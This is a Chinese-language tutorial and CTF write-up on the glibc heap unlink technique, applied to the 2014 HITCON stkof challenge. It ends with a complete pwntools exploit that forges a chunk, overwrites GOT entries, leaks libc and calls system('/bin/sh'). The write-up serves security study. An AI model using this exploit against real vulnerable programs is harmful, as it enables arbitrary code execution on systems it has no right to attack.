Glibc堆利用之unlink超详细讲解

gclome

原文链接：Glibc堆利用之unlink超详细讲解

• 原理
  
  
  

当free堆块时，会检测相邻堆块是否空闲。如果空闲（上一块或者下一块），将进行合并（前合并和后合并）。
空闲堆块一般是双向链表链接（fast bin是单向链表。不适用此漏洞），free的堆块与相邻的空闲堆块合并时会将空闲的堆块从链表摘下来。合并成更大的堆块插入到unsortbin链表中。
初始状态p的chunk1非空闲。Chunk2空闲。查询chunk2的前后链表
FD =Pchunk2->fd
BK=Pchunk2->bk

​

Free掉chunk1检测到相邻chunk空闲。chunk2摘取下来与chunk1合并。放入unsort bin中
FD->bk=BK
BK->fd=FD
​

• 漏洞利用（古老的UNLINK）
  

（32位）通过其他漏洞伪造pchunk2，当free掉pchunk1时
​
FD=Pchunk2->fd=free_addr-12
BK =Pchunk2->bk=shellcode_addr

​

将p的chunk2z摘取下来。FD和BK
FD->bk=BK
BK->fd=FD
​

当执行free时，会执行shellcode处的的代码，但是应该注意的是shellcode+8处被修改为free_addr-12.要想办法绕过。

• 当前版本unlink
  

​
也就是说在查pchunk2前后链表的时候，会检测FD->bk和BK->fd是不是都指向p
如下图所示。之前的利用方式不可使用。方便理解unlink的过程
FD=Pchunk2->fd=free_addr-12
BK=Pchunk2->bk=shellcode_addr
​

可以使用伪造的方式绕过检测
fakeFD-> bk == P <=> *(fakeFD + 12) == P
fakeBK-> fd == P <=> *(fakeBK + 8) == P
当满足上述两式时，可以进入 Unlink 的环节，进行如下操作：
fakeFD-> bk = fakeBK <=> *(fakeFD + 12) = fakeBK
fakeBK-> fd = fakeFD <=> *(fakeBK + 8) = fakeFD
​

或者
​

• 例题2014 HITCON stkof
  

输入 size，分配 size 大小的内存，并在 bss 段记录对应 chunk 的指针，假设其为 global
​

​



read_in：根据指定索引，向分配的内存处读入数据，数据长度可控，这里存在堆溢出的情况
​


free：根据指定索引，释放已经分配的内存块
​

由于程序本身没有进行 setbuf 操作，所以在执行输入输出操作的时候会申请缓冲区。所以Globals[1] 触发器到malloc缓冲区的io函数

1. alloc(0x100)  # idx 1
   
2. alloc(0x30) # idx 2
   
3. alloc(0x80) # idx 3

复制代码

​

1. payload = p64(0)  #prev_size
   
2. 
   
3. payload += p64(0x20)  #size
   
4. payload += p64(head + 16 - 0x18)  #fd
   
5. payload += p64(head + 16 - 0x10)  #bk
   
6. payload += p64(0x20)  # 下一个 chunk的 prev_size 用于通过检测
   
7. payload = payload.ljust(0x30, 'a')
   
8. 
   
9. # 堆溢出global[3]的 chunk'的prev_size
   
10. payload += p64(0x30)
    
11. # 跳过检测上一块的chunk时free的
    
12. payload += p64(0x90)
    
13. edit(2, len(payload), payload)

复制代码

​

​
free(3)检测上一块空闲与上一块合并。触发unlink

​
​

1. payload = 'a' * 8 + p64(stkof.got['free'])+ p64(stkof.got['puts']) + p64(stkof.got['atoi'])
   
2. edit(2, len(payload), payload)

复制代码

​
​
​
​
​

1. payload = p64(stkof.plt['puts'])
   
2. edit(0, len(payload), payload)
   
3. free(1)
   
4. #put_plt（puts_got）

复制代码

​

​

1. payload = p64(system_addr)
   
2. edit(2, len(payload), payload)
   
3. p.send(p64(binsh_addr))
   
4. # atoi(binsh_addr)=>system(bin/sh)

复制代码

​
​

完整exp：

1. context.terminal= ['gnome-terminal', '-x', 'sh', '-c']
   
2. ifargs['DEBUG']:
   
3.     context.log_level = 'debug'
   
4. context.binary ="./stkof"
   
5. stkof =ELF('./stkof')
   
6. ifargs['REMOTE']:
   
7.     p = remote('127.0.0.1', 7777)
   
8. else:
   
9.     p = process("./stkof")
   
10. log.info('PID: '+ str(proc.pidof(p)[0]))
    
11. libc =ELF('./libc.so.6')
    
12. head = 0x602140
    
13. 
    
14. def alloc(size):
    
15.     p.sendline('1')
    
16.     p.sendline(str(size))
    
17.     p.recvuntil('OK\n')
    
18. 
    
19. def edit(idx,size, content):
    
20.     p.sendline('2')
    
21.     p.sendline(str(idx))
    
22.     p.sendline(str(size))
    
23.     p.send(content)
    
24.     p.recvuntil('OK\n')
    
25. 
    
26. def free(idx):
    
27.     p.sendline('3')
    
28.     p.sendline(str(idx))
    
29. 
    
30. def exp():
    
31.     # trigger to malloc buffer for io function
    
32.     alloc(0x100)  # idx 1
    
33.     # begin
    
34.     alloc(0x30) # idx 2
    
35.     # small chunk size in order to triggerunlink
    
36.     alloc(0x80) # idx 3
    
37.     # a fake chunk at global[2]=head+16 who'ssize is 0x20
    
38.     payload = p64(0)  #prev_size
    
39.     payload += p64(0x20)  #size
    
40.     payload += p64(head + 16 - 0x18)  #fd
    
41.     payload += p64(head + 16 - 0x10)  #bk
    
42.     payload += p64(0x20)  # next chunk's prev_size bypass the check
    
43.     payload = payload.ljust(0x30, 'a')
    
44.     # overwrite global[3]'s chunk's prev_size
    
45.     # make it believe that prev chunk is atglobal[2]
    
46.     payload += p64(0x30)
    
47.     # make it believe that prev chunk is free
    
48.     payload += p64(0x90)
    
49.     edit(2, len(payload), payload)
    
50. 
    
51.     # unlink fake chunk, so global[2]=&(global[2])-0x18=head-8
    
52.     free(3)
    
53.     p.recvuntil('OK\n')
    
54. 
    
55.     # overwrite global[0] = free@got,global[1]=puts@got, global[2]=atoi@got
    
56.     payload = 'a' * 8 + p64(stkof.got['free'])+ p64(stkof.got['puts']) + p64(
    
57.         stkof.got['atoi'])
    
58.     edit(2, len(payload), payload)
    
59. 
    
60.     # edit free@got to puts@plt
    
61.     payload = p64(stkof.plt['puts'])
    
62.     edit(0, len(payload), payload)
    
63. 
    
64.     # free global[1] to leak puts addr
    
65.     free(1)
    
66.     puts_addr = p.recvuntil('\nOK\n',drop=True).ljust(8, '\x00')
    
67.     puts_addr = u64(puts_addr)
    
68.     log.success('puts addr: ' + hex(puts_addr))
    
69.     libc_base = puts_addr -libc.symbols['puts']
    
70.     binsh_addr = libc_base +next(libc.search('/bin/sh'))
    
71.     system_addr = libc_base +libc.symbols['system']
    
72.     log.success('libc base: ' + hex(libc_base))
    
73.     log.success('/bin/sh addr: ' +hex(binsh_addr))
    
74.     log.success('system addr: ' +hex(system_addr))
    
75.     # modify atoi@got to system addr
    
76.     payload = p64(system_addr)
    
77.     edit(2, len(payload), payload)
    
78.     p.send(p64(binsh_addr))
    
79.     p.interactive()
    
80. 
    
81. if __name__ =="__main__":
    
82.     exp()

复制代码

​